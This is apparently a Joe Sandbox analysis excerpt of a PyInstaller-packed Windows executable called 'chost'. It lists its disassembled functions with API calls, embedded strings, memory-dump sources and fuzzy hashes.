API ID: CurrentProcess
String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
API String ID: 2050909247-1550345328
Opcode ID: 3c0774a10d9180a9ef9e621267a67a956cc1251727fd489e11b34b92f8f2baae
Instruction ID: 9a114c3843bf75e5076c0475f8d657baff8be09ddb9392e7641fcb66bdde48c1
Opcode Fuzzy Hash: 3c0774a10d9180a9ef9e621267a67a956cc1251727fd489e11b34b92f8f2baae
Instruction Fuzzy Hash: F7518C21B0864792EA30AB33A4821A973A0FF84798F84C5B9EE4CC7796DE3CF555C740

Function 00007FF694368850 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempPathW.KERNEL32(?,?,00000000,00007FF694363CBB), ref: 00007FF6943688F4
GetCurrentProcessId.KERNEL32(?,00000000,00007FF694363CBB), ref: 00007FF6943688FA
CreateDirectoryW.KERNELBASE(?,00000000,00007FF694363CBB), ref: 00007FF69436893C

Part of subcall function 00007FF694368A20: GetEnvironmentVariableW.KERNEL32(00007FF69436388E), ref: 00007FF694368A57
Part of subcall function 00007FF694368A20: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF694368A79

Part of subcall function 00007FF6943782A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6943782C1

Part of subcall function 00007FF694362810: MessageBoxW.USER32 ref: 00007FF6943628EA

Strings

LOADER: length of teporary directory path exceeds maximum path length!, xrefs: 00007FF69436896E
TMP, xrefs: 00007FF6943688B2
LOADER: failed to set the TMP environment variable., xrefs: 00007FF6943688CC
_MEI%d, xrefs: 00007FF694368902
TMP, xrefs: 00007FF69436888C, 00007FF694368993

Memory Dump Source

Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd

Similarity

API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
API String ID: 3563477958-1339014028
Opcode ID: 4e349524156a31c65ddba45994ef87c37bf84ce1b0e485ec316371ea64373d4f
Instruction ID: aef251a8b39d2586d2fea0c913fb3acc5570be9425b6667555f62ba95da060a3
Opcode Fuzzy Hash: 4e349524156a31c65ddba45994ef87c37bf84ce1b0e485ec316371ea64373d4f
Instruction Fuzzy Hash: 54417121B1D64381EA38AB37A8D62B96291EF89B84F40C179ED4DC7796DE3CE504C301

Function 00007FF694361210 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 158
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to extract %s: failed to allocate temporary input buffer!, xrefs: 00007FF6943612BA
1.3.1, xrefs: 00007FF694361249
Failed to extract %s: decompression resulted in return code %d!, xrefs: 00007FF69436141E
Failed to extract %s: failed to allocate temporary output buffer!, xrefs: 00007FF6943612EF
Failed to extract %s: inflateInit() failed with return code %d!, xrefs: 00007FF694361276
malloc, xrefs: 00007FF6943612C1, 00007FF6943612F6

Memory Dump Source

Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd

Similarity

API ID: CurrentProcess
String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
API String ID: 2050909247-2813020118
Opcode ID: 5203fde90a14cfca52878d148793ed0f56fa2f4a03ba52266beea290f2c18543
Instruction ID: f813a1856acce7d8b3ba131ce072bca2542d7676ce791fc6517b6d2ab97eca0e
Opcode Fuzzy Hash: 5203fde90a14cfca52878d148793ed0f56fa2f4a03ba52266beea290f2c18543
Instruction Fuzzy Hash: 2751A022A0864381EA71AF37A4913BE76A1EF85794F948179ED8DC77D5EE3CE501C700

Function 00007FF69437ED80 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(?,?,?,00007FF69437F11A,?,?,-00000018,00007FF69437ADC3,?,?,?,00007FF69437ACBA,?,?,?,00007FF694375FAE), ref: 00007FF69437EEFC
GetProcAddress.KERNEL32(?,?,?,00007FF69437F11A,?,?,-00000018,00007FF69437ADC3,?,?,?,00007FF69437ACBA,?,?,?,00007FF694375FAE), ref: 00007FF69437EF08

Strings

api-ms-, xrefs: 00007FF69437EE46
ext-ms-, xrefs: 00007FF69437EE59

Memory Dump Source

Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
Instruction ID: 8d67b55a8ae088118a163dd5005bf77d52e70ad4ae254cfddca917fc283f9476
Opcode Fuzzy Hash: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
Instruction Fuzzy Hash: D241CC72B1DA12C1FA25CB27988567522A1FF48B90F98897DED5EC7B94EE3CE404C300

Function 00007FF6943636B0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(?,00007FF694363804), ref: 00007FF6943636E1
GetLastError.KERNEL32(?,00007FF694363804), ref: 00007FF6943636EB

Part of subcall function 00007FF694362C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF694363706,?,00007FF694363804), ref: 00007FF694362C9E
Part of subcall function 00007FF694362C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF694363706,?,00007FF694363804), ref: 00007FF694362D63
Part of subcall function 00007FF694362C50: MessageBoxW.USER32 ref: 00007FF694362D99

Strings

Failed to resolve full path to executable %ls., xrefs: 00007FF694363739
GetModuleFileNameW, xrefs: 00007FF6943636FA
\\?\, xrefs: 00007FF69436375A
Failed to obtain executable path., xrefs: 00007FF6943636F3
Failed to convert executable path to UTF-8., xrefs: 00007FF694363790

Memory Dump Source

Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd

Similarity

API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
API String ID: 3187769757-2863816727
Opcode ID: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
Instruction ID: ad89d284a4f32fd5033b4908fd792bae1f8a9b69c2725c3d8090cf31d9438c3b
Opcode Fuzzy Hash: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
Instruction Fuzzy Hash: D5218361B1864381FA309733EC963BA7250FF88394F40817EE65DC26D5EE2CE505C700

Function 00007FF69437BACC Relevance: 10.8, APIs: 7, Instructions: 290
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF69437BEF9

Memory Dump Source

Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 07c5dcf76cbe3182a9f46e495b791f87a2923bbe72b553d2f04cfdf557d03735
Instruction ID: f35ae2f852899ba6825a8f000d08fe4bf3190da51a1e29e64bd24893fb08b0eb
Opcode Fuzzy Hash: 07c5dcf76cbe3182a9f46e495b791f87a2923bbe72b553d2f04cfdf557d03735
Instruction Fuzzy Hash: C7C1C232A0C686C1E7709B3794802BD7A64EB81B98F55C1B9EA8E877D1CE7CE445C700

Function 00007FF694368760 Relevance: 10.6, APIs: 7, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF694368780
OpenProcessToken.ADVAPI32 ref: 00007FF694368793
GetTokenInformation.KERNELBASE ref: 00007FF6943687B8
GetLastError.KERNEL32 ref: 00007FF6943687C2
GetTokenInformation.KERNELBASE ref: 00007FF694368802
ConvertSidToStringSidW.ADVAPI32 ref: 00007FF69436881E
CloseHandle.KERNEL32 ref: 00007FF694368836

Memory Dump Source

Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd

Similarity

API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
String ID:
API String ID: 995526605-0
Opcode ID: ccba17952e233d5b695068aab9421341a55ed3ebff0a2a14ee99ad80d8ea5500
Instruction ID: 9af662ae11957c42ee49bd39f2cb39d3d3b47e81e672457a31fff84a219f86f5
Opcode Fuzzy Hash: ccba17952e233d5b695068aab9421341a55ed3ebff0a2a14ee99ad80d8ea5500
Instruction Fuzzy Hash: 5A212131A0C64342EA249B76F4D522AB7A0EB857E4F108279E6ADC3BE5DF6CD445C740

Function 00007FF6943690E0 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF694368760: GetCurrentProcess.KERNEL32 ref: 00007FF694368780
Part of subcall function 00007FF694368760: OpenProcessToken.ADVAPI32 ref: 00007FF694368793
Part of subcall function 00007FF694368760: GetTokenInformation.KERNELBASE ref: 00007FF6943687B8
Part of subcall function 00007FF694368760: GetLastError.KERNEL32 ref: 00007FF6943687C2
Part of subcall function 00007FF694368760: GetTokenInformation.KERNELBASE ref: 00007FF694368802
Part of subcall function 00007FF694368760: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF69436881E
Part of subcall function 00007FF694368760: CloseHandle.KERNEL32 ref: 00007FF694368836

LocalFree.KERNEL32(?,00007FF694363C55), ref: 00007FF69436916C
LocalFree.KERNEL32(?,00007FF694363C55), ref: 00007FF694369175

Strings

Security descriptor string length exceeds PYI_PATH_MAX!, xrefs: 00007FF694369183
D:(A;;FA;;;%s), xrefs: 00007FF694369157
S-1-3-4, xrefs: 00007FF694369121
D:(A;;FA;;;%s)(A;;FA;;;%s), xrefs: 00007FF694369142

Memory Dump Source

Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd

Similarity

API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
API String ID: 6828938-1529539262
Opcode ID: 3eb7115bd34229e0b110e4578eeeb93c66e7230f7a251aed45e8d0dbb8b27e08
Instruction ID: 835401d8814f9f9f324a306e95aec387caf947763fc2ced7ac8516c4d305421c
Opcode Fuzzy Hash: 3eb7115bd34229e0b110e4578eeeb93c66e7230f7a251aed45e8d0dbb8b27e08
Instruction Fuzzy Hash: 84214F21A1874382F724AB32E9962EA7365FF88780F5480B9EA4DD3796DF3CD845C740

Function 00007FF69437CFD0 Relevance: 6.2, APIs: 4, Instructions: 218
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF69437CFBB), ref: 00007FF69437D0EC
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF69437CFBB), ref: 00007FF69437D177

Memory Dump Source

Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
Instruction ID: 2e69c92b5fee76b3c9db045bb972130a1e9932fa3c44fae0c288559885190782
Opcode Fuzzy Hash: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
Instruction Fuzzy Hash: CE919132E2C652C5F7709F7694C02BD2BA0EB44B98F14817DDE8EA7A85DE38D442C700

Function 00007FF694375698 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6943756C5
CreateFileW.KERNELBASE ref: 00007FF694375704
CloseHandle.KERNEL32 ref: 00007FF694375739

Memory Dump Source

Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd

Similarity

API ID: CloseCreateFileHandle_invalid_parameter_noinfo
String ID:
API String ID: 1279662727-0
Opcode ID: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
Instruction ID: 1215b2d575163631c1e5e14db798a04ecb381d9b9d5665166299f9f957a8589e
Opcode Fuzzy Hash: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
Instruction Fuzzy Hash: 35419232D1C782C3E2689B3295903696360FB947A4F10D379EA9C83ED6DF6CA4E0C740

Function 00007FF69436CCAC Relevance: 4.6, APIs: 3, Instructions: 94COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF69436CE7C: __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF69436CE90

__scrt_acquire_startup_lock.LIBCMT ref: 00007FF69436CCD0
__scrt_release_startup_lock.LIBCMT ref: 00007FF69436CD3E
__scrt_get_show_window_mode.LIBCMT ref: 00007FF69436CD91

Memory Dump Source

Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd

Similarity

API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
String ID:
API String ID: 3251591375-0
Opcode ID: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
Instruction ID: 854a63cb4f7dda085c4bfc935009b4dd2d234d1d3f13c8418eb7930821cafe21
Opcode Fuzzy Hash: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
Instruction Fuzzy Hash: 2B310320E0C24391FA74AB7794A33B93691EF46384F44C4BDEA4ECB2D7DE2EA405C650

Function 00007FF694379AA0 Relevance: 4.5, APIs: 3, Instructions: 14COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,00007FF694379A9C), ref: 00007FF694379AB1
TerminateProcess.KERNEL32(?,?,?,00007FF694379A9C), ref: 00007FF694379ABC
ExitProcess.KERNEL32 ref: 00007FF694379ACB

Memory Dump Source

Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 230ddfbeb2cfdc83e04e02b0fbb537ff9f96aef2fd2a5ab3fdce6eee95276a48
Instruction ID: da69d428a665601bec5a592c3c4b73f8beb6ca6fd9776b0126fb315f70ca5753
Opcode Fuzzy Hash: 230ddfbeb2cfdc83e04e02b0fbb537ff9f96aef2fd2a5ab3fdce6eee95276a48
Instruction Fuzzy Hash: 5CD06720B0974682FA642B7658D90786251EF49B51B1495BCD85FDA397ED6CA449C300

Function 00007FF6943701AC Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6943701F0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6943702E7

Memory Dump Source

Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
Instruction ID: 77da75c9d5c2532d6642757488da921f8e489b15e222c87b49855b6ecbea1396
Opcode Fuzzy Hash: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
Instruction Fuzzy Hash: 38519372B0D641D6FA749A77948067E62A1EB44BA8F14C778EEFD867C5CE3CE441C600

Function 00007FF69437C1A4 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,?,?,?,00007FF69437C33D), ref: 00007FF69437C1F0
GetLastError.KERNEL32(?,?,?,?,?,00007FF69437C33D), ref: 00007FF69437C1FA

Memory Dump Source

Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
Instruction ID: 288b2cef249928aea8583cc93b57c7aaf130ebc51f53ca54a9507e902d315e26
Opcode Fuzzy Hash: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
Instruction Fuzzy Hash: 2611B27161CA8181DA208B36A894169A361EB45BF4F548379EEBD8B7E9CE7CD051C740

Function 00007FF69437A9B8 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,?,?,00007FF694382D92,?,?,?,00007FF694382DCF,?,?,00000000,00007FF694383295,?,?,?,00007FF6943831C7), ref: 00007FF69437A9CE
GetLastError.KERNEL32(?,?,?,00007FF694382D92,?,?,?,00007FF694382DCF,?,?,00000000,00007FF694383295,?,?,?,00007FF6943831C7), ref: 00007FF69437A9D8

Memory Dump Source

Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 4768bb9444967098c6ff0662bce39d003f3d6bed11959a3c87c06bce48e858a7
Instruction ID: 7c3617d7f28f5b64f1b072b12344b0db9073a03d9f3332ddf701b996349bec2f
Opcode Fuzzy Hash: 4768bb9444967098c6ff0662bce39d003f3d6bed11959a3c87c06bce48e858a7
Instruction Fuzzy Hash: B7E04661F1C207C2FF38ABF3A8C51381260EF99B40B4481BCD85DC22A2EE2C6895C300

Function 00007FF69437ABC8 Relevance: 2.6, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?,?,?,00007FF69437AA45,?,?,00000000,00007FF69437AAFA), ref: 00007FF69437AC36
GetLastError.KERNEL32(?,?,?,00007FF69437AA45,?,?,00000000,00007FF69437AAFA), ref: 00007FF69437AC40

Memory Dump Source

Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd

Similarity

API ID: CloseErrorHandleLast
String ID:
API String ID: 918212764-0
Opcode ID: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
Instruction ID: 994d99068fe18482eb28fbef6b3132fdbb818ff5e869af92f1b4b1495ce75774
Opcode Fuzzy Hash: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
Instruction Fuzzy Hash: 0D215031B2C68391EAB4677395D02791682DF847A0F0887BDDAAEC77D5CE6CA445D300

Function 00007FF69437BF1C Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF69437BF44

Memory Dump Source

